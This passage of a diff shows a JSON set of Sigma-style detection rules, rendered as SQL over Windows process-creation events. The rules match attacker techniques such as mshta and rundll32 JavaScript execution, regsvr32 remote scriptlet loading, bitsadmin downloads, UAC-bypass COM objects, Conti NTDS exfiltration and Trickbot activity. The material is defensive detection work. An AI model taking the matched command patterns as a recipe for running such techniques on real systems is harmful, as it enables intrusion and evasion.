ESCAPE '\\' OR (NewProcessName LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winzip_password_compression.yml" + "filename": "proc_creation_win_pua_cleanwipe.yml" }, { - "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", - "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "title": "Potential CVE-2023-21554 QueueJumper Exploitation", + "id": "53207cc2-0745-4c19-bc72-80be1cc16b3f", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], + "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Legitimate use of AnyDesk from a non-standard folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\mqsvc.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" + "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml" }, { - "title": "Suspicious RDP Redirect Using TSCON", - "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "title": "Always Install Elevated MSI Spawned Cmd And Powershell", + "id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", "status": "test", - "description": "Detects a suspicious RDP session redirect using tscon.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%msi%' ESCAPE '\\' AND ParentProcessName LIKE '%tmp' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tscon_rdp_redirect.yml" + "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml" }, { - "title": "PUA - NPS Tunneling Tool Execution", - "id": "68d37776-61db-42f5-bf54-27e87072d17e", + "title": "Firewall Rule Deleted Via Netsh.EXE", + "id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", "status": "experimental", - "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate use" + "Legitimate administration activity", + "Software installations and removal" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%delete %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND CommandLine LIKE '%name=Dropbox%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nps.yml" + "filename": "proc_creation_win_netsh_fw_delete_rule.yml" }, { - "title": "Suspicious Modification Of Scheduled Tasks", - "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", - "status": "experimental", - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1053.005" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_change.yml" + "filename": "proc_creation_win_malware_adwind.yml" }, { - "title": "Execution via stordiag.exe", - "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", - "status": "test", - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "author": "Austin Songer (@austinsonger)", - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], + "title": "Uncommon One Time Only Scheduled Task At 00:00", + "id": "970823b7-273b-460a-8afc-3a6811998529", + "status": "experimental", + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "author": "pH-T (Nextron Systems)", "falsepositives": [ - "Legitimate usage of stordiag.exe." + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_stordiag_susp_child_process.yml" + "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" }, { - "title": "Gpg4Win Decrypt Files From Suspicious Locations", - "id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", - "status": "experimental", - "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", - "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior", + "title": "Trickbot Malware Activity", + "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "status": "stable", + "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1559" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gpg2.exe' ESCAPE '\\' OR Product = 'GNU Privacy Guard (GnuPG)' OR Company = 'g10 Code GmbH') AND CommandLine LIKE '%-passphrase%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_gpg4win_susp_usage.yml" + "filename": "proc_creation_win_malware_trickbot_wermgr.yml" }, { - "title": "Elise Backdoor Activity", - "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "title": "Suspicious JavaScript Execution Via Mshta.EXE", + "id": "67f113fa-e23d-4271-befa-30113b3e08b1", "status": "test", - "description": "Detects Elise backdoor activity used by APT32", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of javascript code using \"mshta.exe\".", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1218.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_elise.yml" + "filename": "proc_creation_win_mshta_javascript.yml" }, { - "title": "CMSTP UAC Bypass via COM Object Access", - "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "status": "stable", - "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", - "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", + "title": "HackTool - RedMimicry Winnti Playbook Execution", + "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", + "author": "Alexander Rausch", "tags": [ "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" + "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" }, { - "title": "Rundll32 JS RunHTMLApplication Pattern", - "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "title": "Conti NTDS Exfiltration Command", + "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "status": "test", - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command used by conti to exfiltrate NTDS", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.collection", + "attack.t1560" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" + "filename": "proc_creation_win_malware_conti_7zip.yml" }, { - "title": "Suspicious Whoami.EXE Execution From Privileged Process", - "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", + "title": "Tor Client/Browser Execution", + "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "status": "test", + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'whoami.exe' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\tor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" + "filename": "proc_creation_win_browsers_tor_execution.yml" }, { - "title": "Renamed Mavinject.EXE Execution", - "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", - "status": "experimental", - "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", + "status": "test", + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "author": "Markus Neis", "tags": [ - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.t1546.011" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((NewProcessName LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_mavinject.yml" + "filename": "proc_creation_win_sdbinst_shim_persistence.yml" }, { - "title": "File Download Via Bitsadmin", - "id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", - "status": "test", - "description": "Detects usage of bitsadmin downloading a file", - "author": "Michael Haag, FPT.EagleEye", + "title": "Suspicious Mshta.EXE Execution Patterns", + "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "status": "experimental", + "description": "Detects suspicious mshta process execution patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Some legitimate apps use this, but limited." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR ((CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_bitsadmin_download.yml" + "filename": "proc_creation_win_mshta_susp_pattern.yml" }, { - "title": "Suspicious Call by Ordinal", - "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "status": "stable", - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "author": "Florian Roth (Nextron Systems)", + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "status": "experimental", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE 